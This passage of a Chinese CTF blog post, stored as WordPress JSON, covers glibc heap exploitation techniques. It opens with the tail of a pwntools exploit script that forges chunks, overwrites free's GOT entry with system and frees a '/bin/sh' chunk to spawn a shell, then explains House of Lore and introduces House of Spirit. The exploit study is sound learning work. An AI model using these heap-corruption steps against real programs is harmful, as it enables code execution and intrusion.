#3\n\n#3.\u628achunk2\u91ca\u653e\u6389\uff0c\u4fee\u6539chunk2\u7684fd\u6307\u9488\uff08\u4e5f\u5c31\u662f\u521a\u597d\u80fd\u6539\u5230\u7684\u524d\u516b\u5b57\u8282\uff09\uff0c\u6307\u5411fakechunk\u4f4d\u7f6e\uff0c\u540c\u65f6\u5728fakechunk\u4f4d\u7f6e\u4f2a\u9020chunk\nfree(2)\nedit(2,p64(bss+0x10)&#91;:-1],p64(0)+p64(0x11)+p64(0)+p64(0xfffffffffffffff1))\n\n#4.\u518d\u91ca\u653echunk3\uff0cchunk3\u548ctop chunk\u5408\u5e76\uff0c\u89e6\u53d1malloc consolidation\uff0cchunk2\u4e5f\u88ab\u5408\u5e76\u5165top chunk\uff0c\u4f46\u662ffake chunk\u7531\u4e8e\u7cbe\u5fc3\u6784\u9020\uff0c\u4f1a\u7ed5\u8fc7\u68c0\u6d4b\uff0c\u5355\u72ec\u8fdb\u5165unsorted bin\u3002\nfree(3)\n\n#5.\u4fee\u6539fake chunk\u7684size\uff0c\u4f7f\u5176\u80fd\u901a\u8fc7\u4e0b\u4e00\u6b65\u7684\u68c0\u6d4b\nedit(2,b'aaaa',p64(0)+p64(0x11)+p64(0)+p64(0xA00001))\n\n#6.\u518d\u7533\u8bf7\u4e00\u4e2a0xA00000\u7684chunk\uff0cfake chunk\u5c31\u4f1a\u8fdb\u5165large bin\u4e4b\u4e2d\u3002\nadd(3,'4') #4\n\n#7.\u4fee\u6539fakechunk\u7684\u5927\u5c0f\uff0c\u4f7f\u5176\u4e3a0xfffffffffffffff0\nedit(2,b'aaaa',p64(0xfffffffffffffff0)+p64(0x10)+p64(0)+p64(0xfffffffffffffff1))\n\n#8. \u7533\u8bf70xFFFFFFFFFFFFFF70\uff08\u56e0\u4e3a\u9898\u76ee\u4e2d\u53ea\u80fd\u7533\u8bf7\u8fd9\u4e2a\uff09,  \u6b64\u65f6unsorted bin\u5c31\u4f1a\u6307\u5411\u76ee\u6807\u5730\u5740\uff0c\u5c31\u53ef\u4ee5\u7533\u8bf7\u5230\u4e00\u4e2a\u53ef\u4ee5\u4fee\u6539ptr\u6307\u9488\u6570\u7ec4\u7684chunk\u3002\nadd(13337,'5') #5\n\n#9.\u4fee\u6539chunk0\u7684\u6307\u9488\u4e3agot\u8868\u4e2dfree\u7684\u5730\u5740\nadd(1,p64(elf.got&#91;'free'])&#91;:-1])\n\n#10.\u4fee\u6539free\u4e3asystem\u51fd\u6570\uff0c\u987a\u4fbf\u8f93\u5165\/bin\/sh\uff08\u4e0d\u7528\u88650\uff0c\u56e0\u4e3aread_end0\u6709\u8fd9\u4e2a\u529f\u80fd\uff09\nedit(0,p64(elf.symbols&#91;'system'])&#91;:-1],'aaaa')\n\n#11.free\u6389\/bin\/sh\u7684\u4f4d\u7f6e\u7684chunk\uff0c\u5373\u8c03\u7528\u4e86system(\/bin\/sh),\u62ff\u5230shell\nedit(6,'\/bin\/sh','aaaa')\nfree(6)\n\n\np.interactive()\n<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Y7V61HB1M@Y@Z@9387YR-1024x392.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"392\" data-original=\"http:\/\/n0ps1ed.top\/wp-content\/uploads\/2024\/12\/Y7V61HB1M@Y@Z@9387YR-1024x392.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-554\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"House_of_Lore\"><\/span>House of Lore<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u53c2\u8003ctfwiki:<a href=\"https:\/\/ctf-wiki.org\/pwn\/linux\/user-mode\/heap\/ptmalloc2\/house-of-lore\/#_1\">House of Lore &#8211; CTF Wiki<\/a><\/p>\n\n\n\n<p>\u539f\u7406\uff1asmall bin\u4e0a\u4f2a\u9020fake chunk\u5e76\u7533\u8bf7\u5230\u8be5\u4f4d\u7f6e\u7684chunk<\/p>\n\n\n\n<p>\u6b65\u9aa4\uff1a<\/p>\n\n\n\n<p>1.\u5728small bin\u4e0a\u6709\u4e00\u4e2achunk0\uff0c\u5e76\u4e14\u6709\u6539\u5199\u8be5chunk\u7684bk\u6307\u9488\u7684\u80fd\u529b<\/p>\n\n\n\n<p>2.\u4fee\u6539chunk0\u7684bk\u6307\u9488\uff0c\u6307\u5411\u76ee\u6807\u5730\u5740<\/p>\n\n\n\n<p>3.\u76ee\u6807\u5730\u5740\u6709\u4f2a\u9020\u597d\u7684fake chunk1\uff0c\u8be5fake chunk1\u7684fd\u6307\u5411chunk0\uff0cbk\u6307\u5411fake chunk2\uff0cfake chunk2\u7684fd\u6307\u5411fake chunk1<\/p>\n\n\n\n<p>4.\u7531\u4e8esmall bin\u662fFIFO\uff08\u5148\u5165\u5148\u51fa\uff09\u7b97\u6cd5\uff0c\u7533\u8bf7\u7b2c\u4e8c\u6b21\u5c31\u80fd\u62ff\u5230fake chunk1\u5730\u5740\u7684chunk\u4e86<\/p>\n\n\n\n<p>\uff08\u6211\u4e4b\u524d\u8fd8\u6709\u70b9\u7591\u60d1\u8fd9\u79cd\u6280\u672f\u6709\u4ec0\u4e48\u7528\uff0c\u56e0\u4e3a\u65e2\u7136\u90fd\u80fd\u5728\u76ee\u6807\u4f4d\u7f6e\u4f2a\u9020fakechunk\u4e86\uff0c\u4e5f\u5c31\u610f\u5473\u7740\u6709\u5199\u7684\u80fd\u529b\uff0c\u4e3a\u4ec0\u4e48\u8fd8\u8981\u591a\u6b64\u4e00\u4e3e\uff1f\u540e\u6765\u60f3\u60f3\uff0c\u5982\u679c\u662f\u53ea\u80fd\u591f\u5199\u4f2a\u9020fakechunk\u7684\u90a3\u51e0\u4e2a\u5b57\u8282\uff0c\u901a\u8fc7\u8fd9\u79cd\u65b9\u6cd5\u53ef\u4ee5\u7533\u8bf7\u5230\u8be5\u4f4d\u7f6e\u5f88\u5927\u7684chunk\uff0c\u4e5f\u5c31\u6269\u5927\u4e86\u5199\u7684\u8303\u56f4\uff1b\u6216\u8005\u662f\u53ef\u80fd\u8ddf\u5176\u4ed6\u6280\u672f\u6253\u914d\u5408\u3002\u8fd9\u79cd\u653b\u51fb\u65b9\u6cd5\u5b9e\u73b0\u7684\u6548\u679c\u80af\u5b9a\u5c31\u4e0d\u5982house of rabbit\u8fd9\u79cd\u80fd\u4efb\u610f\u5730\u5740\u5199\u7684\u725b\u903c\uff09<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>demo\u53ef\u4ee5\u53c2\u8003\uff1a<a href=\"https:\/\/blog.csdn.net\/yjh_fnu_ltn\/article\/details\/140778952\">House of Lore_\u5806house of lore-CSDN\u535a\u5ba2<\/a><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><span class=\"ez-toc-section\" id=\"House_of_Spirit\"><\/span>House of Spirit<span class=\"ez-toc-section-end\"><\/span><\/h2>\n\n\n\n<p>\u5728\u8bb2House of Spirit\u4e4b\u524d\uff0c\u5148\u629b\u51fa\u4e00\u4e2a\u95ee\u9898\uff1a\u4e4b\u524d\u7684\u653b\u51fb\u5229\u7528\uff0cfree\u6389\u7684\u90fd\u662f\u7a0b\u5e8fmalloc\u4ea7\u751f\u7684\u5408\u6cd5chunk\uff0c\u95ee\u9898\u6765\u4e86\uff0cfree\u51fd\u6570\u80fd\u4e0d\u80fdfree\u6389\u4e00\u4e2a\u5b8c\u5168\u4f2a\u9020\u51fa\u6765\u7684chunk\uff1f<\/p>\n\n\n\n<p>\u8fd9\u5c31\u662fHouse of Spirit\u7684\u7cbe\u9ad3\uff1afree\u6389\u4e00\u4e2a\u5b8c\u5168\u4f2a\u9020\u51fa\u6765\u7684chunk\uff0c\u7136\u540e\u7533\u8bf7\u5b83\uff0c\u4f7f\u5176\u53d8\u4e3a\u5408\u6cd5chunk\uff0c\u518d\u8fdb\u4e00\u6b65\u5229\u7528\u3002<\/p>\n\n\n\n<p>\u4f8b\u9898\uff1a2014 hack.lu oreo<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5728\u5b66\u4e60\u4e86unlink\u3001chunk extend\u3001\u5404\u79cdbin attack\u7b49\u57fa\u7840\u653b\u51fb\u6280\u672f\u540e\uff0c\u5f00\u59cb\u8fdb\u5165House  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[17,13],"tags":[14,11],"class_list":["post-529","post","type-post","status-publish","format-standard","hentry","category-17","category-13","tag-pwn","tag-11"],"_links":{"self":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/529","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/comments?post=529"}],"version-history":[{"count":16,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/529\/revisions"}],"predecessor-version":[{"id":829,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/posts\/529\/revisions\/829"}],"wp:attachment":[{"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/media?parent=529"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/categories?post=529"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/n0ps1ed.top\/index.php\/wp-json\/wp\/v2\/tags?post=529"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}